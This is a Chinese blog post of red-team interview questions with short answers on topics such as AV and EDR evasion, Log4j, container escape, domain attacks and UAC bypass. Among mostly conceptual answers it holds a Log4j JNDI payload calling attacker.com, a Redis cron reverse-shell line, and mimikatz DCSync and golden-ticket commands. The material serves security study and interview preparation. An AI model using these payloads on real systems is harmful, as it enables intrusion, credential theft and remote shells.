2025年渗透测试面试题总结-某互联网500强甲方红队攻防对抗研究员(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

攻防对抗研究员

1. 免杀技术

2. PHP5与PHP7的区别

3. Log4j漏洞(CVE-2021-44228)

4. Fastjson不出网利用

5. Java内存马

6. APK双向认证绕过

7. 反序列化漏洞对比

8. 逻辑漏洞

9. 非Web/社工的渗透方法

10. 对抗EDR(终端检测与响应)

11. 隐藏流量特征与IP可信化

12. JWT认证机制

13. K8s集群攻击面

14. 云渗透

15. 容器逃逸

16. MySQL执行系统命令

17. 域攻击

18. Redis获取Shell

19. 小程序攻击方法

20. 域内获取黄金票据

21. 二进制逆向

22. 二进制漏洞

23. 脱壳爱加密/梆梆壳

24. 无线渗透流程

25. Spring4Shell(CVE-2022-22965)

26. Bypass UAC

攻防对抗研究员

1、免杀  

2、php5/7区别

3、log4j 原理如何检测  绕过 不出网

4、fastjson不出网

5、java 内存马

6、apk双向认证如何绕过

7、php反序列化 和java反序列化 .net

8、逻辑漏洞

9、除了web和社工其他方式渗透方法

10、对抗EDR

11、隐藏流量特征 怎么和把ip地址变成可信

12、jwt 认证机制

13、k8s集群

14、云渗透

15、容器逃逸

16、mysql在哪里情况下可以直接执行系统命令

17、域攻击

18、redis获得shell方法

19、小程序的攻击方法

20、域内 有什么方法能拿到黄金票据

21、二进制逆向

22、二进制漏洞

23、爱加密和梆梆壳怎么脱

24、无线渗透怎么去做

25、spring4shell 原理以及如何检测

26、bypass uac

1. 免杀技术

  • 核心原理:通过混淆代码、加密载荷、修改特征码等方式绕过杀毒软件检测。
  • 常见方法
    • 使用无文件攻击(内存加载PE文件)。
    • 动态API调用(如通过哈希值定位函数)。
    • 代码分段执行(Staged Payload)。
    • 利用合法软件白名单(如PowerShell、MsBuild)。
    • 反沙箱技术(检测虚拟机环境)。

2. PHP5与PHP7的区别

  • 类型系统:PHP7支持标量类型声明(int, string等)和返回类型声明。
  • 性能:PHP7引擎(Zend Engine 3.0)性能提升2倍以上。
  • 错误处理:PHP7引入Error异常类,替代部分致命错误。
  • 语法特性:PHP7支持组合比较符(<=>)、匿名类等。
  • 废弃特性:移除了mysql_*函数、ASP风格标签(<% %>)等。

3. Log4j漏洞(CVE-2021-44228)

  • 原理:通过JNDI注入实现远程代码执行(RCE),利用${jndi:ldap://attacker.com/exp} 触发。
  • 检测
    • 流量分析:检测HTTP头、日志中的jndi:模式。
    • 日志监控:查找异常Lookup事件。
  • 绕过
    • 使用${::-j}ndi等字符转义。
    • 利用上下文数据(如User-Agent)注入。
  • 不出网利用
    • 通过DNS协议外带数据。
    • 利用中间件(如Redis)构造内网穿透。

4. Fastjson不出网利用

  • 依赖条件:目标环境需存在可利用的反序列化链(如TemplatesImpl)。
  • 方法
    • 构造恶意JSON触发@type指定危险类。
    • 利用JdbcRowSetImpl结合本地LDAP服务(需绕过高版本补丁)。
    • 结合文件写入(如写入Webshell到/tmp目录)。

5. Java内存马

  • 注入方式
    • Filter/Servlet型:通过动态注册Filter拦截请求。
    • Agent型:利用Instrumentation修改字节码。
  • 检测
    • 内存分析工具(如Arthas)检查加载的类。
    • 对比Web容器配置(如web.xml )与实际Filter链。
  • 对抗:部署RASP(运行时应用自保护)监控类加载行为。

6. APK双向认证绕过

  • 方法
    • 证书绑定绕过:Hook SSL库(如Xposed模块JustTrustMe)。
    • 中间人攻击:伪造CA证书并劫持通信。
    • 反编译修改:删除证书校验逻辑(定位checkClientTrusted方法)。

7. 反序列化漏洞对比

语言触发点典型漏洞链
PHPunserialize()Phar反序列化、魔术方法触发
JavareadObject()CommonsCollections、Fastjson
.NETBinaryFormatterViewState、JSON.NET

8. 逻辑漏洞

  • 常见类型
    • 越权漏洞(水平/垂直权限绕过)。
    • 业务流篡改(如跳过支付步骤)。
    • 竞争条件(并发请求导致库存超卖)。
  • 检测:人工审计业务流程,结合Burp Suite重放测试。

9. 非Web/社工的渗透方法

  • 网络层:ARP欺骗、DNS劫持。
  • 无线攻击:WPA2破解(PMKID捕获)、伪造热点。
  • 物理渗透:BadUSB、HID攻击(如Rubber Ducky)。
  • 供应链攻击:污染软件更新源或依赖库。

10. 对抗EDR(终端检测与响应)

  • 进程隐藏:使用Direct System Call替代API调用。
  • 内存加密:对恶意代码段进行动态解密。
  • 行为混淆:模拟合法进程行为(如注入到explorer.exe )。
  • 驱动对抗:利用漏洞卸载EDR驱动(需内核权限)。

11. 隐藏流量特征与IP可信化

  • 流量伪装
    • 使用HTTPS加密通信。
    • 域前置(Domain Fronting)隐藏真实C2。
  • IP可信化
    • 利用云服务商IP段(如AWS、Azure)。
    • 通过Tor出口节点或CDN(如Cloudflare)代理。

12. JWT认证机制

  • 结构:Header(算法)、Payload(数据)、Signature(签名)。
  • 漏洞
    • 弱密钥爆破(如secret)。
    • 算法篡改(alg:none攻击)。
    • 注入攻击(修改Payload中的用户ID)。

13. K8s集群攻击面

  • 配置错误:未鉴权的API Server(6443端口)。
  • 容器逃逸:利用特权容器挂载宿主机根目录。
  • 敏感数据:从ConfigMap/Secret中获取凭据。

14. 云渗透

  • 攻击路径
    • IAM凭据泄露(如AccessKey硬编码)。
    • 存储桶权限配置错误(AWS S3公开访问)。
    • 虚拟机元数据服务(SSRF获取临时Token)。

15. 容器逃逸

  • 方法
    • 挂载宿主机目录:docker run -v /:/host
    • 利用Linux Capability(如CAP_SYS_ADMIN)。
    • CVE-2021-30465(runc漏洞导致逃逸)。

16. MySQL执行系统命令

  • 条件:需具备FILE权限和secure_file_priv为空。
  • 方法
    • UDF提权:编译恶意.so文件写入插件目录。
    • 利用漏洞:CVE-2016-6662(通过日志文件提权)。

17. 域攻击

  • 横向移动:Pass-the-Hash、Overpass-the-Hash。
  • 权限提升:滥用ACL(如GenericAll权限)。
  • 持久化:Golden Ticket、DCShadow攻击。

18. Redis获取Shell

  • 写SSH密钥config set dir /root/.ssh/ + 写入公钥。
  • 计划任务set x "\n* * * * * bash -i >& /dev/tcp/ip/port 0>&1\n"
  • 主从复制:通过SLAVEOF加载恶意模块(Redis 4.x以上)。

19. 小程序攻击方法

  • 反编译:使用工具(如wxappUnpacker)获取源码。
  • API滥用:未鉴权的云函数调用、硬编码密钥泄露。
  • 本地存储wx.setStorageSync 敏感数据未加密。

20. 域内获取黄金票据

  • 条件:需获取krbtgt用户的NTLM哈希。
  • 步骤
    1. 通过DCSync导出哈希:mimikatz lsadump::dcsync /user:krbtgt
    2. 生成票据:mimikatz kerberos::golden /user:admin /domain:xxx /sid:xxx /krbtgt:xxx

21. 二进制逆向

  • 工具链:IDA Pro(静态分析)、GDB/LLDB(动态调试)、Ghidra(反编译)。
  • 技巧
    • 识别关键函数(如strcmpmemcpy)。
    • 修改ELF头绕过反调试(PT_DENY_ATTACH)。

22. 二进制漏洞

  • 类型
    • 栈溢出(如gets函数)。
    • 堆利用(UAF、Double Free)。
    • 格式化字符串漏洞(printf(user_input))。

23. 脱壳爱加密/梆梆壳

  • 步骤
    1. 动态脱壳:使用Frida Hook dexFile加载函数。
    2. 内存Dump:通过Xposed模块或GDB提取解密后的DEX。
    3. 修复:使用dexfixer工具处理CRC校验。

24. 无线渗透流程

  1. 嗅探airodump-ng捕获握手包。
  2. 破解hashcat爆破WPA2-PSK(字典/掩码攻击)。
  3. 中间人ettercap实施ARP欺骗+SSLStrip降级攻击。

25. Spring4Shell(CVE-2022-22965)

  • 原理:通过数据绑定漏洞修改Tomcat日志路径写入Webshell。
  • 检测
    • 检查spring-webmvc版本(5.3.18以下受影响)。
    • 监控class.module.* 参数传入。

26. Bypass UAC

  • 方法
    • 白名单劫持:替换%SystemRoot%\System32\fodhelper.exe 的DLL。
    • COM接口滥用:利用ICMLuaUtil接口提权(cmstp.exe /s)。
    • 注册表操作:修改HKCU\Software\Classes\ms-settings\shell\open\command
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值